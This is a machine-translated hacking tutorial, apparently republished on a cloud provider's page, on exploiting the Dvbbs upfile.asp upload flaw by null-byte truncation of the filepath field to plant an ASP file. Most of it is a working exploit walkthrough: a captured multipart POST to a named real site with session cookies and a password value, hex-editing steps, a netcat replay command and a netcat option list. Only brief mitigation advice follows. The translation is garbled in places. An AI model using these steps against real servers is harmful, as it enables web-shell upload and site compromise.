2: The principle of vulnerability
The following example assumes the premise
www host: www.***.com;
BBS Path:/bbs/
The flaw originates from the research of moving files on the internet, and suggests some programming experience.
Look at Dvbbs's upfile.asp file, there's no need to read it all
Upfile is uploaded by generating a form table, as follows
<form name= "form" method= "POST" action= "upfile.asp" ...>
<input type= "hidden" name= "filepath" value= "Uploadface" >
<input type= "hidden" name= "act" value= "upload" >
<input type= "File" name= "File1" >
<input type= "hidden" name= "fname" >
<input type= "Submit" name= "submit" value= "Upload" ...></form>
Variables to use:
FilePath Default Value Uploadface property Hiden
Act Default value upload property Hiden
File1 is the file you're going to pass.
The key is to filepath this variable!
By default, our files are uploaded to www.***.com/bbs/uploadface/.
The file is named after your upload time, which is the sentence in Upfile.
Filename=formpath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum& "." &fileext
--------------------------------------
We know that the data in the computer is a "" for the Peugeot and the C language knows
Char data[]= "BBS"
The length of this data array is 4:b B S.
What happens if we construct filepath as follows?
Filepath= "/newmm.asp"
The documents we 2004.09.24.08.24 are going to change.
When not changed:
_blank>http://www.***.com/bbs/uploadface/200409240824.jpg
With the filepath we construct:
_blank>http://www.***.com/newmm.asp/200409240824.jpg
When the server receives filepath data, it detects the newmm.asp behind the
It's the end of the filepath data.
So the files we uploaded, like c:.asp,
Save it as: _blank>http://www.***.com/newmm.asp
3: Late Supplement
After the leak, many sites did the corresponding processing, but for the FilePath filtering and processing are not
There are a lot of sites just add n hiden properties of the variable to deal with the Internet published Upfile.exe is that
Uploading vulnerabilities using tools or filepath variables using tools (Veteran's) ... But the most basic did not change AH.
And there is a similar loophole in the website Plug-ins, I would like to say do not rely on the specific tools
I changed WSE caught in the bag of the filepath variable, and then submitted with NC ...
Even if he adds n a hiden variable it doesn't help.
Of course, if the filepath is strictly filtered, our theories will end.
It's time for our new theory to be born!
4: Detailed Examples:
---------------------
One, WSE grab bag result (save in 1.txt):
Post/bbs/upphoto/upfile.asp http/1.1
Accept:image/gif, Image/x-xbitmap, Image/jpeg, Image/pjpeg, Application/x-shockwave-flash, application/vnd.ms-excel , Application/vnd.ms-powerpoint, Application/msword, */*
Referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp
Accept-language:zh-cn
Content-type:multipart/form-data; boundary=-----------7d423a138d0278
Accept-encoding:gzip, deflate
user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;. NET CLR 1.1.4322)
Host: _blank>www.xin126.com
content-length:1969
Connection:keep-alive
Cache-control:no-cache
cookie:aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; Gamvancookies=1; Regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; Logintry=1; userpass=eb03f6c72908fd84
-----------------------------7d423a138d0278
Content-disposition:form-data; Name= "FilePath"
.. /medias/myphoto/
-----------------------------7d423a138d0278
... ...
Upload
---------------7d423a138d0278-----------------
Second, UltraEdit open 1.txt change data:
......
-----------------------------7d423a138d0278
Content-disposition:form-data; Name= "FilePath"
/newmm.asp█<=== This black represents a space is 0x20, change to 0x00 on it
......
----------------------------
Third, recalculate the cookie length, and then NC submit
NC-VV _blank>www.xin126.com <1.txt
UltraEdit is a 16-bit editor that can be downloaded online
We are mainly used to write that end Peugeot: ====>16:0x00 or 00h
In fact, when you change the filepath directly to the end of the add a 00 on the OK
Calculate the length of the cookie ===> you changed the Fillepath, the length of the + or-cookies changed.
......
Host: _blank>www.xin126.com
content-length:1969 <====== is this.
Connection:keep-alive
Cache-control:no-cache
......
The calculation will be? A letter, a number is 1
The solution for the Upload vulnerability: (for reference only)
1, the general upload is the upload path as a variable to deal with
===> Our strategy is to turn filepath into a constant ...
This method is currently the most effective (I think)
2, to strengthen the treatment of the original we are read here on the end
We continue to read where the next variable begins, and the process is OK.
Attached: NC Usage:
Listening for external hosts
NC [-options] hostname port[s] [ports] ...
Listening on the local host
Nc-l-P port [options] [hostname] [port]
Options
-D detach from console, stealth mode
-E Prog inbound program to exec [dangerous!!]
-G Gateway source-routing Hop Point[s], up to 8
-G num source-routing pointer:4, 8, 12, ...
-H This cruft
-I secs delay interval for lines sent, ports scanned
-L Listen mode, for inbound connects
-L listen harder, re-listen on socket close
-N numeric-only IP addresses, no DNS
-o file hex dump of traffic
-P port Local port number
-R randomize Local and remote ports
-S addr Local Source Address
-T Answer telnet negotiation
-U UDP mode
-v VERBOSE [use twice to is more verbose]
-W secs timeout for connects and final net reads
-Z zero-i/o mode [used for scanning]
Port numbers can be individual or ranges:m-n [inclusive]
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
